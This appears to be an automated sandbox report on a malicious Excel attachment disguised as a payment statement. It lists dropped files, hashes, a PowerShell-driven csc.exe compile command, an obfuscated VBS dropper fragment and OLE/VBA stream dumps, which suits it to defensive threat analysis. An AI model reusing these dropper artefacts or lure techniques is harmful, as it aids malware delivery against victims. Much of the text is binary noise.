File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.2075636604436255
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fLWXJWXqzxs7+AEszIP23fLWXJWXPn:p37Lvkmb6KzzkBWZEozkM
MD5:	5D3D6B77F70DAA154603A97B4AB7B38A
SHA1:	4D572AED09887C5FA8955728BF2885B9CE007D5E
SHA-256:	9A12A1E813096A14AF78726D4DA8F8850809E11763EBCF2BFD53C56BBBD60598
SHA-512:	E2133B68452E5469A2A856029CD0A295EF0DD09341361E80A9AD3CB9890A0348B48BD42CD61CAFD9CECEE412F4BC4CF78B0EB6F5C3884DDD7C4DDA9A10AA707E
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.0.cs"

C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.870140813436552
Encrypted:	false
SSDEEP:	24:etGSOpeYYLPl78y713fukVHnCa0kiRb0PtkZfYmoTyAFWI+ycuZhNjakS1PNnq:6NYwPlIMvxnCtRbdJ3o+91ulja3vq
MD5:	36438E036554EC5F381224F00A72D5F7
SHA1:	BEFE98F727854FF2A5D59506B45206244B073E46
SHA-256:	61C901A7CB52D834FC775436E278E8967AB194657DE38C2D5AC52EFA8EE48DD2
SHA-512:	0543AF275D822E7FC1272DC4FCB5A3CC5C285091D9DF76B8D60B17B2F217B81A342A215A536E4832116BEB3343FEAB375BB4835B39363B43073256F15532C9CA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J[g...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+...................................................... 9.....P ......K.........Q.....[.....c.....k.....u...K.....K...!.K.....K.......!............9......................................."..........<Module>.l2

C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
Category:	modified
Size (bytes):	866
Entropy (8bit):	5.314133359411756
Encrypted:	false
SSDEEP:	24:AId3ka6KzfEoyKaMD5DqBVKVrdFAMBJTH:Akka60fEoyKdDcVKdBJj
MD5:	E1D635577241482ACAD47F3D396A1F8E
SHA1:	02759AF74E4343AC5F92E172219FE8F5075E0D88
SHA-256:	1E276E101D1E164E0FB91B08979CD20E1029A0276DAFDF04DED19C34720FC427
SHA-512:	85F78CDB20A23D57623DA8DE66342D1EA4D7FD3BA81A455E4B3A00BE8836ED500CCB650CAA32DD0D813132BF5733EA22F90C9D283046855ABAF8EA05D36771EF
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\rfrrto3b.bb0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\v0qk2mtz.oaa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\~DF090E1EE033FA1134.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	53760
Entropy (8bit):	7.343028902139218
Encrypted:	false
SSDEEP:	768:NxY7596+R5U8C0OpFS3dP1hc4MUmCFOwEE2oZjUgW+LatYoAl0:Nb+frCpFS39dMGHEE9UOCYoI
MD5:	73C4B63EDB34000352C06324C80FD4EC
SHA1:	1FEDE11FD202B3D5671516D2D66FA7046F9F7831
SHA-256:	F6974BDC75973148A2ECEAED9C4580955296BCAB880275F914DECFCF26BF08EB
SHA-512:	D963F9C7370A02FE32E9C4D805560BC36E33EA8116E9B2871DDF5F9F555E7351D4DD062678A7312362C92322F043ABAE57561F4790ED5227F63104522B59806A
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...............................................................................

C:\Users\user\AppData\Local\Temp\~DF9C0C285E2B3CCBCF.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	5.868269488275137
Encrypted:	false
SSDEEP:	1536:Ib+frCpFS39dMGHEE9UOCYoIn5z87MB8:Ib+jukMWEE9UUoE5E
MD5:	890A7114F245CBBD0E0B6AC464861569
SHA1:	BACF1185074503D04C717CE2F5B3ED9233DF06FA
SHA-256:	45B34AE55DD3FC3506C8B1237D5D8BD9849875556CA894454940DE284DAD8F51
SHA-512:	C5DB520035B94C83C3AD8D06EF465907280B5DBAD4859C45C3207FDF286EADBDC61B750D88106D4EC4E406A6746B823B54E8D92FC371D80BEBC792E4F31C94C5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF3B9FCE37B1970AF.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	6.484929266807686
Encrypted:	false
SSDEEP:	192:wqkCuQ59vUM8pNReR0LZ9QK2etokDeLqg4GJ8:wXG5ll8rReRKZ28aLqrm8
MD5:	ACD7E254260BAF047004C2D369770650
SHA1:	744755E9B3BBA2340E2C408231EF9D42AE1DA531
SHA-256:	A96A8184DC4633694AC9278E79B6E2C2D1AC1C5C265C37D834F0D3D59F11E5DD
SHA-512:	E6BE4EABC680E5BDD3FA86A51C3E8C66FE54888DCD8F73B7A3ED93253AFBF91F2171F1E2A140039EE542A76F89E870D90D82BA089C32FACA48915517DDE40B3D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (3397), with CRLF line terminators
Category:	dropped
Size (bytes):	154312
Entropy (8bit):	3.806639108429499
Encrypted:	false
SSDEEP:	3072:puPqJg1SUqFVMcZjuPqJg1SUqFVMcRuPqJg1SUqFVMcP:pEq8SbOcZjEq8SbOcREq8SbOcP
MD5:	DB9CA30AC0C6D2526A780AB2E0AD8046
SHA1:	895B9150FB6B527C28155C466E10B553521C209B
SHA-256:	2BFEB2D07560A76ACC7181E72B31B8F758BE6300B81E9AAB7EB3157AE7E89730
SHA-512:	9994EA28C119620A70169B18CDA3D7F93083A352EE55A2BC72FB14EA125A67B5D2A93200A7D488D8B1712F39B3CE62B972471E2508269B9158A78E85E8B6374D
Malicious:	true
Preview:	...... . . . .....L.L.K.q.z.i.i.f.i.U.G.W.i.s.K. .=. .".g.c.u.N.p.a.p.p.i.q.f.z.l.x.n.".....P.h.U.m.f.h.N.j.S.h.p.v.W.k.m. .=. .".a.K.f.K.f.h.i.Z.O.t.n.p.p.a.Z.".....G.L.u.K.S.G.i.x.c.c.W.K.U.Q.W. .=. .".W.c.h.P.z.e.K.s.P.L.i.Z.K.h.N.".........W.L.T.C.W.d.U.p.U.G.N.K.W.h.u. .=. .".U.e.W.L.z.R.j.u.K.L.a.n.A.u.i.".....W.x.G.n.e.W.Z.R.U.A.W.k.K.f.W. .=. .".L.t.p.N.L.Z.k.C.h.N.d.i.q.W.i.".....k.L.m.c.W.J.K.G.J.c.L.k.P.b.v. .=. .".z.A.f.W.e.N.o.K.I.d.W.k.f.R.K.".....A.L.e.c.P.e.P.u.c.e.s.e.W.a.N. .=. .".d.Z.j.A.s.u.f.K.N.o.s.K.i.o.i.".....G.e.i.l.z.c.B.N.q.r.z.S.e.q.d. .=. .".i.o.K.W.r.L.P.v.m.q.o.L.j.H.z.".....n.h.d.W.S.G.c.z.P.W.W.l.i.c.W. .=. .".g.k.L.a.u.K.W.m.W.f.k.g.v.u.L.".....A.x.G.e.A.j.e.W.f.P.K.b.A.m.p. .=. .".W.n.G.W.W.K.K.o.K.K.x.K.i.I.z.".....b.L.L.h.i.K.k.g.o.K.b.b.o.I.b. .=. .".j.G.W.e.I.K.N.n.p.J.m.K.h.U.L.".....A.G.P.S.U.i.f.W.m.L.o.o.L.K.n. .=. .".G.k.L.Z.A.z.U.G.x.e.U.U.v.L.N.".....N.m.G.g.p.i.K.h.W.N.B.A.Z.h.c. .=. .".q.C.q.G.o.o.c.O.n.e.L.L.p.h.W.".....l.K.S.L.W.f.L.W.

C:\Users\user\Desktop\~$SOA USD67,353.35.xla.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Dec 12 09:24:27 2024, Security: 1
Entropy (8bit):	7.738332781909748
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	SOA USD67,353.35.xla.xlsx
File size:	1'062'400 bytes
MD5:	2c85440bb7983bbcda4cfb9f2350f95f
SHA1:	ae1f72edfd479dcf08cb80ea8bea1bc5429c1dbc
SHA256:	ce3ef0f989fb870bb0258926e344421055dbe53067e06b5635ca7931b2fb0bc5
SHA512:	0e9bae7614d1fd7902e78b773861e77b4964468209ed391d836407107862e46f9951abfff8dded3c3bb7f1dd8078cc924e2ec2f3721ed0cfd12c66b198c8ca37
SSDEEP:	12288:h8pmzHJEUiOIBUzMTShD3DERnLRmF8DoEP+xpsAQx1Zj+j1EPZbsMozlwgaiXksl:HBaQbARM8zo8Z+jwkVNU7+w
TLSH:	F23501E5B68DAB52DA0A123575F3939E1714AC03D902827737F8731E1AF76D08603F9A
File Content Preview:	........................>........................................................... ...!..."...O...P...Q..............._.......\|.......~......................................................................................................................

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "SOA USD67,353.35.xla.xlsx"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-12-12 09:24:27
Creating Application:	Microsoft Excel
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \| > 1 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7c 3e 31 f4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \| > C . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7c 3e 43 8a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \| > & 1 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7c 3e 26 31 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \| > H . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7c 3e 48 a9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.3020681057018666
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . W . w L . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD0067A7C9/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD0067A7C9/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
